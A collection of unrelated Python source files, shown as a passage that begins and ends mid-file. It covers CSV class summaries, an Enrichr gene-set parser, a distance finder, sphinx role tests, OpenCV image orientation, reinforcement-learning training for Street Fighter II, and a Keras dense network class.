    def readCSVFileVariables(self, inputCSV, numVariables):
        """Parse the CSV body into rows of [classname(str), value(float), ...].

        Skips lines containing '#' and the header line; raises Exception when
        a row does not have exactly numVariables + 1 columns.
        """
        data = list()
        dataFile = open(inputCSV, 'r')
        first = True
        numVariables = numVariables + 1 # The class column
        for eachLine in dataFile:
            comment = checkforHash(eachLine)
            if comment == False:
                if first:
                    # Skip the header line.
                    first = False
                else:
                    tokens = stringTokenizer(eachLine, ',')
                    if len(tokens) == numVariables:
                        dataElement = list()
                        firstElement = True
                        for token in tokens:
                            if firstElement:
                                # First column is the class name, kept as a string.
                                dataElement.append(str(token.strip()))
                                firstElement = False
                            else:
                                dataElement.append(float(token.strip()))
                        data.append(dataElement)
                    else:
                        raise Exception('Not enough tokens in a inputCSV line')
        dataFile.close()
        return data
    def getClassnames(self, data):
        """Return the unique class names (column 0 of each row), in first-seen order."""
        classnames = list()
        for item in data:
            found = False
            for classname in classnames:
                if item[0] == classname:
                    found = True
            if not found:
                classnames.append(item[0])
        return classnames
    def getDataSummary(self, data, classname):
        """Build the summary row for one class.

        Sums every variable column over the rows belonging to *classname*,
        then converts each sum to a percentage of the class's grand total.
        Returns [classname, pct1, pct2, ...].
        """
        summary = list()
        count = 0;
        total = 0;
        first = True
        for item in data:
            if first:
                # Initialise the summary row from the first data row's width:
                # [classname, 0, 0, ...].
                first = False
                firstItem = True
                for i in range(len(item)):
                    if firstItem:
                        firstItem = False
                        summary.append(classname)
                    else:
                        summary.append(0)
            if item[0] == classname:
                firstItem = True
                for i in range(len(item)):
                    if firstItem:
                        # Skip the class-name column.
                        firstItem = False
                    else:
                        summary[i] = summary[i] + item[i]
                        total = total + item[i];
                count = count + 1
        first = True
        for i in range(len(summary)):
            if first:
                first = False
            else:
                # Convert each per-variable sum to a percentage of the class total.
                summary[i] = (summary[i]/total)*100
        return summary
    def createOutput(self, data, outputCSV, classnames, variables):
        """Write the header row plus one summary row per class to outputCSV."""
        outFile = open(outputCSV, 'w')
        outFile.write("class")
        for var in variables:
            outFile.write(",")
            outFile.write(var)
        outFile.write("\n")
        for classname in classnames:
            summary = self.getDataSummary(data, classname)
            first = True
            for item in summary:
                if first:
                    outFile.write(str(item))
                    first = False
                else:
                    outFile.write(",")
                    outFile.write(str(item))
            outFile.write("\n")
            # Echo each row to stdout as progress feedback (Python 2 print).
            print summary
            outFile.flush()
        outFile.close()
    def run(self):
        """Entry point: expects sys.argv = [script, inputCSV, outputCSV]."""
        numArgs = len(sys.argv)
        if numArgs == 3:
            inputCSV = sys.argv[1].strip()
            outputCSV = sys.argv[2].strip()
            variables = self.readVariableNames(inputCSV)
            data = self.readCSVFileVariables(inputCSV, len(variables))
            classnames = self.getClassnames(data)
            self.createOutput(data, outputCSV, classnames, variables)
            print classnames
        else:
            self.help()
    def help(self):
        """Print usage information."""
        print 'CSVClassPlot.py script generates a summary row for each class in the input CSV file\n'
        print 'Usage (1): python summaryrows.py <INPUT.csv> <OUTPUT_CSV>'
if __name__ == '__main__':
    # Build the summary object and process sys.argv (input CSV, output CSV).
    obj = SummaryRows()
    obj.run()
|
from django.shortcuts import render
#from arches.app.models.system_settings import settings
def index(request):
    """Render the application's landing page template (index.htm)."""
    return render(request, 'index.htm')
|
"""Extension of utilities.py to provide functions required to check the
version information of enrichr and determine if it needs to be updated.
Classes:
Enrichr: Extends the SrcClass class and provides the static variables and
enrichr specific functions required to perform a check on enrichr.
Functions:
get_SrcClass: returns a Enrichr object
main: runs compare_versions (see utilities.py) on a Enrichr object
"""
import csv
import hashlib
import os
import config_utilities as cf
import table_utilities as tu
from check_utilities import SrcClass, compare_versions
def get_SrcClass(args):
    """Build and return an Enrichr source-class object.

    Allows callers that import this module to obtain the source class
    and access its functions.

    Args:
        args: configuration arguments forwarded to the Enrichr constructor.

    Returns:
        class: a source class object
    """
    src_class = Enrichr(args)
    return src_class
class Enrichr(SrcClass):
    """Extends SrcClass to provide enrichr specific check functions.

    This Enrichr class provides source-specific functions that check the
    enrichr version information and determine if it differs from the current
    version in the Knowledge Network (KN).

    Attributes:
        see utilities.SrcClass
    """
    def __init__(self, args=cf.config_args()):
        """Init a Enrichr with the staticly defined parameters.

        This calls the SrcClass constructor (see utilities.SrcClass)

        NOTE(review): the default ``args=cf.config_args()`` is evaluated once
        at import time, not per call — confirm this is intended.
        """
        name = 'enrichr'
        url_base = ('http://amp.pharm.mssm.edu/Enrichr/'
                    'geneSetLibrary?mode=text&libraryName=')
        # Maps each Enrichr library name to an "et_hint::node_prefix" pair;
        # table() splits each value on '::' to build edge and node records.
        aliases = {
            "Achilles_fitness_decrease": "achilles_genetic_fitness::ach_dn",
            "Achilles_fitness_increase": "achilles_genetic_fitness::ach_up",
            "Aging_Perturbations_from_GEO_down": "GEO_expression_set::aging_dn",
            "Aging_Perturbations_from_GEO_up": "GEO_expression_set::aging_up",
            "Allen_Brain_Atlas_down": "allen_brain_atlas_signature::aba_dn",
            "Allen_Brain_Atlas_up": "allen_brain_atlas_signature::aba_up",
            "Cancer_Cell_Line_Encyclopedia": "enrichr_cell_signature::ccle",
            "ChEA_2015": "enrichr_ChIP_gene_set::chea",
            "dbGaP": "enrichr_phenotype_signature::dbgap",
            "Disease_Perturbations_from_GEO_down": "GEO_expression_set::dis-pert_dn",
            "Disease_Perturbations_from_GEO_up": "GEO_expression_set::dis-pert_up",
            "Disease_Signatures_from_GEO_down_2014": "GEO_expression_set::dis-sig_dn",
            "Disease_Signatures_from_GEO_up_2014": "GEO_expression_set::dis-sig_up",
            "Drug_Perturbations_from_GEO_2014": "GEO_expression_set::drug_pert",
            "Drug_Perturbations_from_GEO_down": "GEO_expression_set::drug_dn",
            "Drug_Perturbations_from_GEO_up": "GEO_expression_set::drug_up",
            "ENCODE_Histone_Modifications_2015": "enrichr_ChIP_gene_set::ENCODE_HM",
            "ENCODE_TF_ChIP-seq_2015": "enrichr_ChIP_gene_set::ENCODE_TF",
            "Epigenomics_Roadmap_HM_ChIP-seq": "enrichr_ChIP_gene_set::ER_HM",
            "ESCAPE": "ESCAPE_gene_set::ESCAPE",
            "GeneSigDB": "genesigdb_gene_signature::gsigdb",
            "GTEx_Tissue_Sample_Gene_Expression_Profiles_down": "enrichr_tissue_signature::GTEx_dn",
            "GTEx_Tissue_Sample_Gene_Expression_Profiles_up": "enrichr_tissue_signature::GTEx_up",
            "HMDB_Metabolites": "HMDB_metabolite_signatures::HMDB",
            "Human_Gene_Atlas": "enrichr_tissue_signature::HGA",
            "Human_Phenotype_Ontology": "enrichr_phenotype_signature::HPO",
            "KEA_2015": "KEA_kinase_signatures::KEA",
            "Kinase_Perturbations_from_GEO_down": "GEO_expression_set::kinase_dn",
            "Kinase_Perturbations_from_GEO_up": "GEO_expression_set::kinase_up",
            "Ligand_Perturbations_from_GEO_down": "GEO_expression_set::ligand_dn",
            "Ligand_Perturbations_from_GEO_up": "GEO_expression_set::ligand_up",
            "LINCS_L1000_Chem_Pert_down": "LINCS_down_set::LINCS_dn",
            "LINCS_L1000_Chem_Pert_up": "LINCS_up_set::LINCS_up",
            "MCF7_Perturbations_from_GEO_down": "GEO_expression_set::MCF7_dn",
            "MCF7_Perturbations_from_GEO_up": "GEO_expression_set::MCF7_up",
            "MGI_Mammalian_Phenotype_2013": "enrichr_phenotype_signature::MGI",
            "MGI_Mammalian_Phenotype_Level_3": "enrichr_phenotype_signature::MGI_L3",
            "MGI_Mammalian_Phenotype_Level_4": "enrichr_phenotype_signature::MGI_L4",
            "Microbe_Perturbations_from_GEO_down": "GEO_expression_set::microbe_dn",
            "Microbe_Perturbations_from_GEO_up": "GEO_expression_set::microbe_up",
            "Mouse_Gene_Atlas": "enrichr_phenotype_signature::MGA",
            "NCI-60_Cancer_Cell_Lines": "enrichr_cell_signature::NCI",
            "NCI-Nature_2016": "enrichr_pathway::NCI",
            "NURSA_Human_Endogenous_Complexome": "PPI_complex::NHEC",
            "OMIM_Disease": "enrichr_phenotype_signature::OMIM-dis",
            "OMIM_Expanded": "enrichr_phenotype_signature::OMIM-exp",
            "Panther_2016": "panther_classification::Panther",
            "PPI_Hub_Proteins": "PPI_hub::",
            "SILAC_Phosphoproteomics": "SILAC_phosphoproteomics::SILCA",
            "Single_Gene_Perturbations_from_GEO_down": "GEO_expression_set::gene_dn",
            "Single_Gene_Perturbations_from_GEO_up": "GEO_expression_set::gene_up",
            "TargetScan_microRNA": "TargetScan_microRNA::TargetScan",
            "TF-LOF_Expression_from_GEO": "GEO_expression_set::TF-LOF",
            "Tissue_Protein_Expression_from_Human_Proteome_Map": "enrichr_tissue_signature::HPM",
            "Tissue_Protein_Expression_from_ProteomicsDB": "enrichr_tissue_signature::PDB",
            "Virus_Perturbations_from_GEO_down": "GEO_expression_set::virus_dn",
            "Virus_Perturbations_from_GEO_up": "GEO_expression_set::virus_up",
            "WikiPathways_2016": "enrichr_pathway::WikiPath"
        }
        super(Enrichr, self).__init__(name, url_base, aliases, args)
        self.chunk_size = 5000
        # no per-alias modification date is published; recorded as 'unknown'
        self.date_modified = 'unknown'
        self.source_url = "http://amp.pharm.mssm.edu/Enrichr/"
        self.image = "https://lw-static-files.s3.amazonaws.com/public/logos/2688.png"
        self.reference = ("Kuleshov MV, Jones MR, Rouillard AD, et al. Enrichr: a comprehensive "
                          "gene set enrichment analysis web server 2016 update. Nucleic Acids Res. "
                          "2016;44(W1):W90-7.")
        self.pmid = 27141961
        self.license = ('Enrichr\'s web-based tools and services are free for academic, non-profit '
                        'use, but for commercial uses please contact <a '
                        'href="http://www.ip.mountsinai.org/">MSIP</a> for a license.')

    def get_remote_url(self, alias):
        """Return the remote url needed to fetch the file corresponding to the
        alias.

        This returns the url needed to fetch the file corresponding to the
        alias. The url is constructed using the base_url, alias, and source
        version information.

        Args:
            alias (str): An alias defined in self.aliases.

        Returns:
            str: The url needed to fetch the file corresponding to the alias.
        """
        url = self.url_base + alias
        return url

    def table(self, raw_line, version_dict):
        """Uses the provided raw_line file to produce a 2table_edge file, an
        edge_meta file, a node and/or node_meta file (only for property nodes).

        This returns nothing but produces the table formatted files from the
        provided raw_line file:
            raw_line (line_hash, line_num, file_id, raw_line)
            table_file (line_hash, n1name, n1hint, n1type, n1spec,
                        n2name, n2hint, n2type, n2spec, et_hint, score,
                        table_hash)
            edge_meta (line_hash, info_type, info_desc)
            node_meta (node_id,
                       info_type (evidence, relationship, experiment, or link),
                       info_desc (text))
            node (node_id, n_alias, n_type)

        Args:
            raw_line(str): The path to the raw_line file
            version_dict (dict): A dictionary describing the attributes of the
                alias for a source.

        Returns:
        """
        #outfiles
        table_file = raw_line.replace('raw_line', 'table')
        n_meta_file = raw_line.replace('raw_line', 'node_meta')
        node_file = raw_line.replace('raw_line', 'node')
        #static column values
        alias = version_dict['alias']
        source = version_dict['source']
        # these libraries describe mouse phenotypes, so their genes map to
        # the mouse taxon (10090) with MGI identifiers instead of HGNC
        mouse_aliases = ["MGI_Mammalian_Phenotype_2013", \
            "MGI_Mammalian_Phenotype_Level_3",\
            "MGI_Mammalian_Phenotype_Level_4", "Mouse_Gene_Atlas"]
        n1type = 'property'
        n_type = 'Property'
        n1spec = '0'
        n1hint = source + '_' + alias
        n2type = 'gene'
        if alias in mouse_aliases:
            n2spec = '10090'
            n2hint = 'MGI'
        else:
            n2spec = '9606'
            n2hint = 'HGNC'
        # alias value encodes "edge-type-hint::node-name-prefix"
        (et_hint, node_prefix) = self.aliases[alias].split('::')
        score = 1
        # PPI hub sets are gene-gene edges, not property-gene edges
        if alias == 'PPI_Hub_Proteins':
            n1type = 'gene'
            n1spec = '9606'
            n1hint = 'HGNC'
        with open(raw_line, encoding='utf-8') as infile, \
            open(table_file, 'w') as edges,\
            open(n_meta_file, 'w') as n_meta, \
            open(node_file, 'w') as nfile:
            edge_writer = csv.writer(edges, delimiter='\t', lineterminator='\n')
            n_meta_writer = csv.writer(n_meta, delimiter='\t', lineterminator='\n')
            n_writer = csv.writer(nfile, delimiter='\t', lineterminator='\n')
            for line in infile:
                line = line.replace('"', '').strip().split('\t')
                #line = re.split('\s{2,}', line)
                # skip lines with no payload beyond the hash
                if len(line) == 1:
                    continue
                chksm = line[0]
                # columns 0-2 are (line_hash, line_num, file_id); the payload starts at 3
                raw = line[3:]
                n1_orig_name = raw[0]
                if not n1_orig_name:
                    continue
                n1_kn_name = n1_orig_name
                # property nodes get a prefixed KN name plus node/node_meta rows
                if alias != 'PPI_Hub_Proteins':
                    n1_kn_name = cf.pretty_name(node_prefix + '_'+ n1_orig_name)
                    n_meta_writer.writerow([n1_kn_name, 'orig_desc', n1_orig_name])
                    n_writer.writerow([n1_kn_name, n1_kn_name, n_type])
                for n2_id in raw[1:]:
                    # drop any ",weight" suffix on the member gene id
                    n2_id = n2_id.split(',')[0]
                    if n2_id == '':
                        continue
                    # edge hash over all columns identifies the table row
                    hasher = hashlib.md5()
                    hasher.update('\t'.join([chksm, n1_kn_name, n1hint, n1type, n1spec,\
                        n2_id, n2hint, n2type, n2spec, et_hint,\
                        str(score)]).encode())
                    t_chksum = hasher.hexdigest()
                    edge_writer.writerow([chksm, n1_kn_name, n1hint, n1type, n1spec, \
                            n2_id, n2hint, n2type, n2spec, et_hint, score, \
                            t_chksum])
        if alias != 'PPI_Hub_Proteins':
            # de-duplicate the node and node_meta outputs
            outfile = n_meta_file.replace('node_meta', 'unique.node_meta')
            tu.csu(n_meta_file, outfile)
            outfile = node_file.replace('node', 'unique.node')
            tu.csu(node_file, outfile)
        else:
            # gene-gene edges produce no property nodes; discard the empty files
            os.remove(n_meta_file)
            os.remove(node_file)
def main():
    """Check Enrichr version information via compare_versions.

    Runs compare_versions (see utilities.compare_versions) on a freshly
    constructed Enrichr object to determine whether a fetch is needed;
    the version information found is also printed.

    Returns:
        dict: A nested dictionary describing the version information for each
            alias described in Enrichr.
    """
    src = Enrichr()
    compare_versions(src)
if __name__ == "__main__":
    main()  # allow running the version check directly as a script
|
#Author: Jayendra Matarage
#Title: Distance Finder
#Date : 31, Jan, 2019
from Getdata import Getdata
from distance import Distance
# Module-level helper instances shared by main(): Getdata provides position
# lookups and Distance computes the distance between two position records.
getdata = Getdata()
distanceCal = Distance()
def _read_point(ordinal):
    """Prompt until the user enters a position name known to the data source.

    Args:
        ordinal: 'first' or 'second'; used only in the prompt text.

    Returns:
        str: a position name for which getdata.checkPoing returned data.
    """
    point = input("Enter " + ordinal + " position: ")
    while point == '':
        point = input("Re Enter " + ordinal + " position: ")
    check = getdata.checkPoing(point)
    while len(check) == 0:
        print("No position data")
        point = input("Re Enter " + ordinal + " position: ")
        check = getdata.checkPoing(point)
    return point

def main():
    """Interactively read two positions and report the distance between them.

    Loops until the user declines to run another query (previously this
    recursed into main(), risking RecursionError on long sessions; the
    duplicated prompt/validation code is now shared via _read_point).
    """
    while True:
        print("---------------------------------")
        print("|\t\tDISTANCE FINDER\t\t|")
        print("---------------------------------")
        point_one = _read_point("first")
        point_two = _read_point("second")
        data = getdata.readData(point_one, point_two)
        print("|\t First Point: " + data[0][0][0][0])
        print("|\t Second Point: " + data[1][0][0][0])
        print("---------------------------------")
        distance = distanceCal.generateDistance(data[0][0][0], data[1][0][0])
        print("Approximate distance of " + data[0][0][0][0] + " to " + data[1][0][0][0] + " is " + str(distance) + " km")
        choice = input("Find distance again ? (Y)es or (N)o : ")
        if choice != "Y":
            break
if __name__ == '__main__':
    main()  # start the interactive prompt only when run as a script
|
class LTEMol():
    """Placeholder for an LTE molecular model; all methods are stubs.

    Previously every method was declared without ``self``, so even
    ``LTEMol()`` raised TypeError (``__init__() takes 0 positional
    arguments but 1 was given``).
    """

    def __init__(self):
        # No state yet; stub constructor.
        pass

    def tex(self):
        """Excitation temperature (not yet implemented)."""
        pass

    def Tbkg(self):
        """Background temperature (not yet implemented)."""
        pass
|
"""
# Copyright 2022 Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
import logging
from cibyl.exceptions.plugin import MissingPlugin
from cibyl.models.ci.environment import Environment
LOG = logging.getLogger(__name__)
def extend_models(plugin_name):
    """Import the named cibyl plugin and let it extend the Environment API.

    Args:
        plugin_name: Name of a plugin module under ``cibyl.plugins``.

    Raises:
        MissingPlugin: If the plugin (or anything it imports) cannot be found.
    """
    try:
        # lazy %-style args: the message is only formatted if actually emitted
        LOG.info("Loading plugin: %s", plugin_name)
        loaded_plugin = __import__(f"cibyl.plugins.{plugin_name}",
                                   fromlist=[''])
        loaded_plugin.Plugin()._extend(Environment.API)
    # ModuleNotFoundError is a subclass of ImportError; kept for clarity
    except (ImportError, ModuleNotFoundError) as err:
        # chain the cause so the underlying import failure is not lost
        raise MissingPlugin(plugin_name) from err
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011, Sebastian Wiesner <lunaryorn@gmail.com>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
test_role
=========
Test the ``issue`` role.
.. moduleauthor:: Sebastian Wiesner <lunaryorn@gmail.com>
"""
from __future__ import (print_function, division, unicode_literals,
absolute_import)
import pytest
from sphinxcontrib.issuetracker import Issue
# NOTE: the pytest_funcarg__ prefix is the legacy (pre-fixture-decorator)
# pytest spelling for a fixture named "issue".
def pytest_funcarg__issue(request):
    """
    A dummy issue, just to trigger issue resolval so that transformations can
    be seen in the output.
    """
    return Issue(id='10', title='Eggs', closed=False, url='eggs')
@pytest.mark.with_content(':issue:`10`')
def test_simple(doctree, issue):
    """
    Test simple usage of the role: the issue id becomes both the xref
    target and its display text.
    """
    pytest.assert_issue_pending_xref(doctree, '10', '10')
@pytest.mark.with_content(':issue:`foo <10>`')
def test_with_title(doctree, issue):
    """
    Test role with an explicit title: the xref targets issue 10 but
    displays 'foo'.
    """
    pytest.assert_issue_pending_xref(doctree, '10', 'foo')
@pytest.mark.confoverrides(issuetracker_plaintext_issues=False)
@pytest.mark.with_content(':issue:`10` #10')
def test_without_plaintext_issues(doctree, issue):
    """
    Test that the role still works even if plaintext issues are disabled.
    (The bare '#10' in the content should then NOT be turned into a ref.)
    """
    pytest.assert_issue_pending_xref(doctree, '10', '10')
|
'''Display a sum problems with a function returning a string,
not printing directly.
'''
def sumProblemString(x, y):
    """Return a sentence stating the sum of x and y.

    Args:
        x: first addend.
        y: second addend.

    Returns:
        str: 'The sum of {x} and {y} is {x+y}.'
    """
    total = x + y  # renamed from 'sum', which shadowed the builtin
    return 'The sum of {} and {} is {}.'.format(x, y, total)
def main():
    """Demonstrate sumProblemString with fixed and user-supplied values."""
    for left, right in ((2, 3), (1234567890123, 535790269358)):
        print(sumProblemString(left, right))
    first = int(input("Enter an integer: "))
    second = int(input("Enter another integer: "))
    print(sumProblemString(first, second))
# Guard the demo so importing this module does not trigger interactive input.
if __name__ == '__main__':
    main()
|
import os
import cv2
import numpy as np
import time
def find_orientation(image, template):
    """Count template-match locations in image above a fixed threshold.

    Args:
        image: BGR or grayscale image array (BGR is converted to grayscale).
        template: grayscale template image to match.

    Returns:
        int: number of positions whose TM_CCOEFF_NORMED score is >= 0.6.
    """
    if len(image.shape) == 3:
        img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    else:
        img_gray = image
    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    threshold = 0.6
    # Count matches directly; the previous per-coordinate Python loop only
    # incremented a counter, so this is equivalent and O(1) Python-side.
    return int(np.count_nonzero(res >= threshold))
# Grayscale query template loaded once at import time and reused by orientate();
# imread(..., 0) loads the image as single-channel grayscale.
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
template = cv2.imread(os.path.join(BASE_PATH, "query.png"), 0)
def orientate(image):
    """Pick the better of the image and its 180-degree rotation.

    The orientation with more template matches (see find_orientation)
    wins; ties keep the original orientation.

    Args:
        image: input image array.

    Returns:
        tuple: (best-oriented image, rotation applied in degrees (0 or 180),
        elapsed wall-clock seconds).
    """
    started = time.time()
    candidates = [image]
    scores = [find_orientation(image, template)]
    flipped = cv2.rotate(image, cv2.ROTATE_180)
    candidates.append(flipped)
    scores.append(find_orientation(flipped, template))
    # max() returns the first maximal index, matching the original strict-'>'
    best = max(range(len(scores)), key=lambda idx: scores[idx])
    elapsed = time.time() - started
    return candidates[best], best * 180, elapsed
|
"""
Train an agent using Proximal Policy Optimization from OpenAI Baselines
"""
import argparse
import sys
import retro
import os
import numpy as np
import gym
import tensorflow as tf
from baselines.common.vec_env import SubprocVecEnv
from baselines.common.vec_env.vec_video_recorder import VecVideoRecorder
from ppo2 import ppo2
from baselines.common.atari_wrappers import WarpFrame, ScaledFloatFrame
from acer import acer
from RyuDiscretizer import RyuDiscretizer, RyuDiscretizerDefending
FPS = 30
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
LOG_PATH = os.path.join(SCRIPT_DIR, 'model')
CHECKPOINTS_PATH = os.path.join(LOG_PATH, 'checkpoints')
MODEL_PATH = os.path.join(CHECKPOINTS_PATH, 'latest')
def make_sf2_env():
    """Create a single-player SuperStreetFighter2 retro environment.

    Registers the bundled custom integration directory, builds the env with
    RAM observations and a filtered action space, and wraps it in the
    Ryu defending-move discretizer.

    Returns:
        the wrapped retro environment.
    """
    # make the bundled ROM/state integration visible to retro
    retro.data.Integrations.add_custom_path(
        os.path.join(SCRIPT_DIR, "custom_integrations")
    )
    env = retro.make(
        game='SuperStreetFighter2-Snes',
        state=retro.State.DEFAULT,
        scenario=None,
        inttype=retro.data.Integrations.CUSTOM_ONLY,
        obs_type=retro.Observations.RAM,  # retro.Observations.IMAGE
        players=1,  # players=2
        use_restricted_actions=retro.Actions.FILTERED,  # retro.Actions.DISCRETE
    )
    # restrict the controller to Ryu's defensive move combinations
    env = RyuDiscretizerDefending(env)
    # env = WarpFrame(env, width=61, height=47, grayscale=True)
    # env = ScaledFloatFrame(env)
    return env
def main():
    """Train the agent with ACER on vectorized, video-recorded SF2 envs.

    Sets up OpenAI Baselines logging, builds the (currently single)
    subprocess env, wraps it with periodic video recording, and runs
    acer.learn with an MLP policy. A previously-used ppo2 configuration is
    kept below, commented out, for reference.
    """
    os.environ['OPENAI_LOGDIR'] = LOG_PATH
    number_of_environments = 1
    venv = SubprocVecEnv([make_sf2_env] * number_of_environments)
    video_path = './recording'
    # record a 5-minute clip every `video_length` steps
    video_length = 5 * 60 * FPS
    venv = VecVideoRecorder(venv, video_path, record_video_trigger=lambda step: step %
                            video_length == 0, video_length=video_length)
    # ppo2.learn(
    #     network='mlp',
    #     env=venv,
    #     # eval_env=venv,
    #     total_timesteps=40000000,
    #     nsteps=128,  # 5 * FPS,
    #     nminibatches=number_of_environments,
    #     lam=0.95,
    #     gamma=0.99,
    #     noptepochs=3,
    #     log_interval=1000,
    #     ent_coef=.01,
    #     lr=lambda alpha: 2.5e-4 * alpha,
    #     vf_coef=1.0,
    #     cliprange=lambda alpha: 0.1 * alpha,
    #     save_interval=1000,
    #     # load_path=MODEL_PATH,
    #     # neuronal network parameters
    #     activation=tf.nn.relu,
    #     num_layers=2,  # 4, 2
    #     num_hidden=48,  # 64, 64
    #     layer_norm=False
    # )
    acer.learn(
        network='mlp',  # 'impala_cnn'
        env=venv,
        total_timesteps=40000000,
        nsteps=128,  # 5 * FPS,
        q_coef=1.0,
        ent_coef=0.001,
        max_grad_norm=10,
        lr=7e-4,
        lrschedule='linear',
        rprop_epsilon=1e-5,
        rprop_alpha=0.99,
        gamma=0.99,
        log_interval=1000,
        buffer_size=50000,
        replay_ratio=4,
        replay_start=10000,
        c=10.0,
        trust_region=True,
        delta=1,
        alpha=0.99,
        # load_path=MODEL_PATH,
        save_interval=1000,
        # neuronal network parameters
        activation=tf.nn.relu,
        num_layers=2,  # 4, 2
        num_hidden=48,  # 64, 64
        layer_norm=False
    )
if __name__ == '__main__':
    main()  # start training only when executed as a script
|
import numpy as np
import pandas as pd
import os
from os.path import exists, join
from tensorflow.keras.layers import Input, Dense, Dropout, GaussianNoise
from tensorflow.keras.models import Model
from tensorflow.keras.regularizers import l2
from tensorflow.keras.optimizers import Adam, SGD
import xarray as xr
class DenseNeuralNetwork(object):
    """
    A Dense Neural Network Model that can support arbitrary numbers of hidden layers.

    Attributes:
        hidden_layers: Number of hidden layers
        hidden_neurons: Number of neurons in each hidden layer
        inputs: Number of input values
        outputs: Number of output values
        activation: Type of activation function
        output_activation: Activation function applied to the output layer
        optimizer: Name of optimizer or optimizer object.
        loss: Name of loss function or loss object
        use_noise: Whether or not additive Gaussian noise layers are included in the network
        noise_sd: The standard deviation of the Gaussian noise layers
        use_dropout: Whether or not Dropout layers are added to the network
        dropout_alpha: proportion of neurons randomly set to 0.
        batch_size: Number of examples per batch
        epochs: Number of epochs to train
        verbose: Level of detail to provide during training
        model: Keras Model object
    """
    def __init__(self, hidden_layers=1, hidden_neurons=4, activation="relu",
                 output_activation="linear", optimizer="adam", loss="mse", use_noise=False, noise_sd=0.01,
                 lr=0.001, use_dropout=False, dropout_alpha=0.1, batch_size=128, epochs=2,
                 l2_weight=0.01, sgd_momentum=0.9, adam_beta_1=0.9, adam_beta_2=0.999, decay=0, verbose=0,
                 classifier=False):
        self.hidden_layers = hidden_layers
        self.hidden_neurons = hidden_neurons
        self.activation = activation
        self.output_activation = output_activation
        self.optimizer = optimizer
        # built in build_neural_network from the hyperparameters below
        self.optimizer_obj = None
        self.sgd_momentum = sgd_momentum
        self.adam_beta_1 = adam_beta_1
        self.adam_beta_2 = adam_beta_2
        self.loss = loss
        self.lr = lr
        self.l2_weight = l2_weight
        self.batch_size = batch_size
        self.use_noise = use_noise
        self.noise_sd = noise_sd
        self.use_dropout = use_dropout
        self.dropout_alpha = dropout_alpha
        self.epochs = epochs
        self.decay = decay
        self.verbose = verbose
        self.classifier = classifier
        # set during fit() when classifier=True (sorted unique class labels)
        self.y_labels = None
        self.model = None

    def build_neural_network(self, inputs, outputs):
        """
        Create Keras neural network model and compile it.

        Args:
            inputs (int): Number of input predictor variables
            outputs (int): Number of output predictor variables
        """
        nn_input = Input(shape=(inputs,), name="input")
        nn_model = nn_input
        for h in range(self.hidden_layers):
            nn_model = Dense(self.hidden_neurons, activation=self.activation,
                             kernel_regularizer=l2(self.l2_weight), name=f"dense_{h:02d}")(nn_model)
            if self.use_dropout:
                nn_model = Dropout(self.dropout_alpha, name=f"dropout_h_{h:02d}")(nn_model)
            if self.use_noise:
                nn_model = GaussianNoise(self.noise_sd, name=f"ganoise_h_{h:02d}")(nn_model)
        nn_model = Dense(outputs,
                         activation=self.output_activation, name=f"dense_{self.hidden_layers:02d}")(nn_model)
        self.model = Model(nn_input, nn_model)
        if self.optimizer == "adam":
            self.optimizer_obj = Adam(lr=self.lr, beta_1=self.adam_beta_1,
                                      beta_2=self.adam_beta_2, decay=self.decay)
        elif self.optimizer == "sgd":
            self.optimizer_obj = SGD(lr=self.lr, momentum=self.sgd_momentum, decay=self.decay)
        else:
            # unknown name or caller-supplied optimizer object: pass it through
            self.optimizer_obj = self.optimizer
        # BUG FIX: compile with the configured optimizer object. Previously the
        # string name (self.optimizer) was passed, so the Adam/SGD instance
        # built above — and its lr/momentum/beta/decay settings — was discarded
        # and Keras silently used default optimizer hyperparameters.
        self.model.compile(optimizer=self.optimizer_obj, loss=self.loss)

    def fit(self, x, y):
        """Build the network for the given data shapes and train it.

        Args:
            x: 2D array of input predictors (examples, features).
            y: 1D or 2D array of targets; class labels when classifier=True.
        """
        inputs = x.shape[1]
        if len(y.shape) == 1:
            outputs = 1
        else:
            outputs = y.shape[1]
        if self.classifier:
            outputs = np.unique(y).size
        self.build_neural_network(inputs, outputs)
        if self.classifier:
            self.y_labels = np.unique(y)
            # one-hot encode the labels for categorical training
            y_class = np.zeros((y.shape[0], self.y_labels.size), dtype=np.int32)
            for col, label in enumerate(self.y_labels):
                y_class[y == label, col] = 1
            self.model.fit(x, y_class, batch_size=self.batch_size, epochs=self.epochs, verbose=self.verbose)
        else:
            self.model.fit(x, y, batch_size=self.batch_size, epochs=self.epochs, verbose=self.verbose)
        return

    def save_fortran_model(self, filename):
        """
        Save neural network weights to a netCDF file that can be read by module_neural_net.f90.

        Args:
